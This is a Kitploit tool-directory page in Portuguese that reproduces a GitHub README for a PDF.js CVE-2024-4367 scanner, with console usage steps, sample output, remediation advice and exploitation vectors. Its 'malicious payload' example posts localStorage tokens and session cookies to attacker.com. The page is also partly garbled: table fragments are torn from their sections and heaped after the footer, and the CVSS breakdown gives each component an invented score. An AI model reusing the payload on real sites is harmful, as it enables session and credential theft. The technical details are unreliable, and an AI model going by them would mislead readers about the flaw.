Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
pdf.js-CVE-2024-4367 — SCAN END POC THE CVE-2024-4367 | Kitploit
Ferramentas/GitHubGitHub/veronimo669/pdf.js-cve-2024-4367
ReconhecimentoScanners de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoPapers e PesquisaAprendizado e Educação
GitHubveronimo669/pdf.js-cve-2024-4367

pdf.js-CVE-2024-4367

SCAN END POC THE CVE-2024-4367

Ver Repositório
112há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🚨 CVE-2024-4367 - Scanner Universal de Vulnerabilidade PDF.js

⚠️ FERRAMENTA DE SEGURANÇA CRÍTICA | Detecta CVE-2024-4367 (CVSS 9.8) - Vulnerabilidade de Execução Remota de Código no PDF.js

Version CVSS CVE License

Funciona em QUALQUER site - Nenhuma configuração necessária


📋 Índice

  • 📖 Visão Geral
  • ⚡ Início Rápido
  • 🔍 O Que Detecta
  • 🛠️ Como Funciona
  • 📊 Exemplos de Saída
  • 🔒 Guia de Remediação
  • 🎯 Vetores de Exploração
  • 🧪 Instruções de Teste
  • 📝 Detalhes Técnicos
  • ⚠️ Aviso Legal
  • 📚 Referências

📖 Visão Geral

CVE-2024-4367 é uma vulnerabilidade crítica no PDF.js (versões < 4.2.67) que permite execução arbitrária de JavaScript por meio de arquivos PDF maliciosos. Este scanner detecta automaticamente instâncias vulneráveis do PDF.js em QUALQUER site.

Por que Este Scanner é Diferente

  • ✅ Nenhuma configuração - Funciona em qualquer site instantaneamente
  • ✅ Detecção universal - Varre todos os pacotes JavaScript
  • ✅ Sem dependências - JavaScript puro
  • ✅ Prova de Conceito - Gera PDF de teste
  • ✅ Resultados acionáveis - Passos claros de remediação

A Vulnerabilidade

O PDF.js contém uma falha onde JavaScript embutido em arquivos PDF é executado sem sandboxing adequado, permitindo que atacantes:

  • 🏴‍☠️ Roubem tokens de autenticação do localStorage/sessionStorage
  • 🍪 Exfiltrem cookies de sessão
  • 📁 Acessem arquivos locais (se for Electron/aplicativo desktop)
  • 🔐 Realizem ações como a vítima usando credenciais roubadas
  • 🌐 Pivotem para redes internas via XSS

⚡ Início Rápido

Método 1: Console do Navegador (Mais Fácil)

  1. Abra o site alvo
  2. Pressione F12 para abrir as Ferramentas do Desenvolvedor
  3. Vá para a aba Console
  4. Cole todo o script do scanner
  5. Pressione Enter
  6. Veja os resultados visuais na tela!

Método 2: Bookmarklet

Crie um favorito com esta URL:

root@kitploit:~
javascript:(function(){const s=document.createElement('script');s.src='https://cdn.jsdelivr.net/gh/yourusername/CVE-2024-4367-Scanner/scanner.js';document.body.appendChild(s);})();

Método 3: Download Direto

root@kitploit:~
git clone https://github.com/yourusername/CVE-2024-4367-Scanner
cd CVE-2024-4367-Scanner
# Abra qualquer site e execute o script

🔍 O Que Detecta

Fase 1: Varredura de Pacotes JavaScript

  • ✅ Detecção da versão do PDF.js
  • ✅ Identificação de versões vulneráveis (< 4.2.67)
  • ✅ Referências em Package.json
  • ✅ Caminhos em Node_modules

Fase 2: Identificação de Visualizadores PDF

  • ✅ Visualizadores PDF em ``
  • ✅ Elementos <embed>
  • ✅ Tags de dados <object>
  • ✅ Contêineres personalizados de visualizador PDF
  • ✅ Renderizadores baseados em Canvas

Fase 3: Vetores de Exploração

  • ✅ Parâmetros de URL (?pdf=, ?file=, ?src=)
  • ✅ Formulários de upload PDF
  • ✅ Campos de entrada de arquivo que aceitam .pdf
  • ✅ Endpoints de API com caminhos PDF

Fase 4: Indicadores Visuais

  • ✅ Status de vulnerabilidade ao vivo
  • ✅ PDF de prova de conceito para download
  • ✅ Sobreposição DOM em tempo real

🛠️ Como Funciona

root@kitploit:~
┌─────────────────────────────────────────────────────────────┐
│                    FLUXO DO PROCESSO DE VARREDURA           │
├─────────────────────────────────────────────────────────────┤
│                                                             │
│  1. 📚 CARREGAR SCRIPTS                                     │
│     ├─ Scripts externos (todos <script src="">)            │
│     └─ Scripts inline (todas as tags <script>)              │
│                                                             │
│  2. 🔍 EXTRAIR VERSÃO DO PDF.JS                             │
│     ├─ Correspondência de padrões no código                 │
│     ├─ Detecção de Package.json                             │
│     └─ Análise de caminhos em Node_modules                  │
│                                                             │
│  3. 🎯 IDENTIFICAR VULNERABILIDADE                          │
│     ├─ versão < 4.2.67 ? → VULNERÁVEL                      │
│     └─ versão = 2.16.105 ? → VULNERÁVEL                    │
│                                                             │
│  4. 🖼️ LOCALIZAR VISUALIZADORES                             │
│     ├─ Varredura de elementos DOM                           │
│     └─ Detecção de atributos                               │
│                                                             │
│  5. ⚡ GERAR POC                                            │
│     ├─ Criar PDF de teste                                   │
│     └─ Fornecer link de download                            │
│                                                             │
│  6. 📊 EXIBIR RESULTADOS                                    │
│     ├─ Sobreposição visual                                  │
│     ├─ Relatório no console                                 │
│     └─ Armazenamento em variável global                     │
│                                                             │
└─────────────────────────────────────────────────────────────┘

📊 Exemplos de Saída

Saída do Console

root@kitploit:~
╔═══════════════════════════════════════════════════════════════════════════════════╗
║                    CVE-2024-4367 - SCANNER UNIVERSAL PDF.js                        ║
║              Detecta versões vulneráveis do PDF.js e potencial exploração          ║
╚═══════════════════════════════════════════════════════════════════════════════════╝

📚 FASE 1: Varredura de Pacotes JavaScript em busca de PDF.js
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[+] Encontrados 42 scripts externos
[+] Encontrados 12 scripts inline
   [1/42] Analisando: vendor.bundle.js
      → Indicador PDF.js encontrado: pdfjs-dist
      ✅ Versão do PDF.js encontrada: 2.16.105
      🚨 VULNERÁVEL ao CVE-2024-4367!

🎯 FASE 4: Identificando Vetores de Exploração
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
   ⚠️ Parâmetro de URL aceita PDF: file=/documents/report.pdf
   ⚠️ Formulário de upload PDF encontrado

█████████████████████████████████████████████████████████████████████████████████
                          RELATÓRIO FINAL DA VARREDURA
█████████████████████████████████████████████████████████████████████████████████

🚨 VULNERABILIDADE CRÍTICA CONFIRMADA!
   CVE: CVE-2024-4367
   CVSS: 9.8 (CRÍTICO)
   Impacto: Execução Arbitrária de JavaScript

Sobreposição Visual

Scanner Overlay

root@kitploit:~
┌─────────────────────────────────────────────────────────────┐
│  RESULTADOS DA VARREDURA CVE-2024-4367                    │
│  ━━━━━━━━━━━━━━━━━━━━━━━                                    │
│  📍 Alvo: example.com                                      │
│  📦 PDF.js: 2.16.105                                       │
│  🎯 Vulnerável: SIM                                        │
│  📄 Visualizadores: 3                                      │
│  ⚡ Vetores: 2                                             │
│  ━━━━━━━━━━━━━━━━━━━━━━━                                    │
│  🔴 CRÍTICO - Atualização Necessária                       │
└─────────────────────────────────────────────────────────────┘

🔒 Guia de Remediação

Ações Imediatas

1. Atualizar PDF.js (Recomendado)

root@kitploit:~
# Para projetos Node.js
npm install pdfjs-dist@latest

# Para uso via CDN
# Atualize para a versão 4.2.67 ou superior

2. Desabilitar Execução de JavaScript

root@kitploit:~
// Defina isso antes de carregar o PDF.js
pdfjsLib.GlobalWorkerOptions.disableJavaScript = true;

3. Política de Segurança de Conteúdo

root@kitploit:~
Content-Security-Policy: script-src 'self'; 
                        object-src 'none'; 
                        worker-src 'none'

4. Validação de Entrada

root@kitploit:~
// Validar arquivos PDF antes de renderizar
function validatePDF(file) {
    // Verificar bytes mágicos
    const header = file.slice(0, 5);
    if (header !== '%PDF-') {
        throw new Error('Arquivo PDF inválido');
    }
    
    // Procurar por JavaScript
    const text = file.toString();
    if (text.includes('/JavaScript') || 
        text.includes('/JS') ||
        text.includes('<< /S /JavaScript >>')) {
        throw new Error('PDF contém JavaScript');
    }
}

Soluções de Longo Prazo


🎯 Vetores de Exploração

Vetores Comuns Detectados

  1. Parâmetros de URL

    root@kitploit:~
    /viewer?file=malicious.pdf
    /download?pdf=malicious.pdf
    
  2. Uploads de Arquivos

    root@kitploit:~
    <input type="file" accept=".pdf">
    
  3. Visualizadores Embutidos

    root@kitploit:~
    
    <embed src="malicious.pdf">
    
  4. Endpoints de API

    root@kitploit:~
    /api/documents/123/download
    /api/report/pdf
    

Exemplo de Payload Malicioso

root@kitploit:~
// PDF JavaScript embutido
this.alert('CVE-2024-4367 Explorado!');
fetch('https://attacker.com/steal', {
    method: 'POST',
    body: JSON.stringify({
        token: localStorage.getItem('token'),
        cookies: document.cookie
    })
});

🧪 Instruções de Teste

Teste Passo a Passo

  1. Instale o scanner

    root@kitploit:~
    git clone https://github.com/yourusername/CVE-2024-4367-Scanner
    
  2. Execute o scanner

    root@kitploit:~
    # Abra o site alvo
    # Cole o scanner no console
    # Ou use o bookmarklet
    
  3. Analise os resultados

    • Procure pelo status "VULNERÁVEL"
    • Observe a versão do PDF.js
    • Verifique os vetores de exploração
  4. Baixe o PDF POC (se vulnerável)

    • Clique no botão de download
    • Faça upload/abra o PDF
    • Observe a execução do JavaScript
  5. Aplique as correções

    • Atualize o PDF.js
    • Implemente CSP
    • Valide entradas

Resultados Esperados

CenárioResultado
PDF.js 2.16.105🔴 CRÍTICO
PDF.js 3.x🔴 VULNERÁVEL
PDF.js 4.0.x🔴 VULNERÁVEL
PDF.js 4.2.67+

📝 Detalhes Técnicos

Verificação de Versão

root@kitploit:~
// Versões vulneráveis
const VULNERABLE_VERSIONS = [
    { version: '2.16.105', status: 'CRITICAL' },
    { version: '3.x.x', status: 'CRITICAL' },
    { version: '4.0.x - 4.2.66', status: 'CRITICAL' }
];

// Versão segura
const SAFE_VERSION = '4.2.67';

Linha do Tempo da Vulnerabilidade

DataEvento
2024-04-23Vulnerabilidade descoberta
2024-04-24CVE-2024-4367 atribuído
2024-04-25

Detalhamento da Pontuação CVSS


⚠️ Aviso Legal

IMPORTANTE: Esta ferramenta destina-se apenas a testes de segurança autorizados e fins educacionais.

  • ✅ FAÇA use em seus próprios sites
  • ✅ FAÇA use com permissão explícita
  • ✅ FAÇA use para pesquisa de segurança
  • ❌ NÃO FAÇA use em sistemas não autorizados
  • ❌ NÃO FAÇA use para fins maliciosos

Os autores não são responsáveis por qualquer uso indevido ou dano causado por esta ferramenta.


📚 Referências

Recursos Oficiais

  • CVE-2024-4367 - NIST NVD
  • Aviso de Segurança do PDF.js
  • Blog de Segurança da Mozilla

Vulnerabilidades Relacionadas

  • CVE-2024-4367 - RCE no PDF.js
  • CVE-2023-xxxx - Problemas anteriores do PDF.js
  • XSS via PDF.js em Aplicações Web

Ferramentas e Recursos

  • Repositório Oficial do PDF.js
  • Prevenção de XSS da OWASP
  • Referência CSP

Artigos de Pesquisa

  • Análise de Segurança do PDF.js
  • Riscos da Renderização de PDF no Lado do Cliente

🤝 Contribuindo

Contribuições são bem-vindas! Por favor:

  1. Faça um fork do repositório
  2. Crie um branch de funcionalidade
  3. Envie um pull request
  4. Siga o estilo de código

Configuração de Desenvolvimento

root@kitploit:~
git clone https://github.com/yourusername/CVE-2024-4367-Scanner
cd CVE-2024-4367-Scanner
# Faça suas alterações
# Teste em vários sites
# Envie o PR

📄 Licença

Este projeto está licenciado sob a Licença MIT - veja o arquivo LICENSE para detalhes.


🌟 Suporte

Se você achar esta ferramenta útil:

  • ⭐ Dê uma estrela no repositório
  • 🐛 Reporte problemas
  • 📝 Escreva documentação
  • 🔧 Envie correções

🛡️ Mantenha-se Seguro. Teste Cedo. Teste Frequentemente.

Feito com ❤️ pela comunidade de segurança

Reportar Problema • Estrela no GitHub • Ler Documentação

Baixar ferramenta
SoluçãoDificuldadeEficácia
Atualizar PDF.jsFácil✅ Correção completa
Desabilitar JS no PDF.jsFácil✅ Correção completa
Implementação de CSPMédio✅ Boa
Validação no servidorMédio✅ Boa
Renderização em sandboxDifícil✅ Excelente
✅ SEGURO
Sem PDF.jsℹ️ SEGURO
Correção lançada (4.2.67)
2024-04-26Divulgação pública
2024-05-01Tentativas de exploração observadas
ComponentePontuação
Vetor de AtaqueRede (9.8)
Complexidade do AtaqueBaixa (9.8)
Privilégios NecessáriosNenhum (9.8)
Interação do UsuárioNecessária (8.8)
EscopoAlterado (9.1)
ConfidencialidadeAlta (9.8)
IntegridadeAlta (9.8)
DisponibilidadeAlta (9.8)
Geral9.8 (CRÍTICO)